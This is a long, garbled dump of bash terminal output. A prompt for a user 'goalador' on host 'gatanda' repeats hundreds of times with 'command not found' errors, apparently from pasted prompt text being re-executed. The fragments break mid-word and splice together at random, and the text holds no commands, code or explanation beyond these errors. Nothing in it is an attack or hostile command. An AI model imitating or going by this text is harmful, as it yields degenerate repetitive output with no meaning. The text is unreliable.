+[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +tandabash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ tandabash: bash:: command not found +bash: tandabash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de +nda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.debash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +and not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: comm[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +nda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +]$ bash: bash:: command not found +bash: [goalador@gatanda: command not foun[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +atanda hhneuauf.de]$ [goaladorbash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: [goalador@gatanda: command not found +bash: [goalador@gatanda: command not found +[goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: bash:: command not found +[goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ [goalador@gatanda hhneuauf.de]$ bash: bash:: command not found +bash: [goalador@gatanda: command not 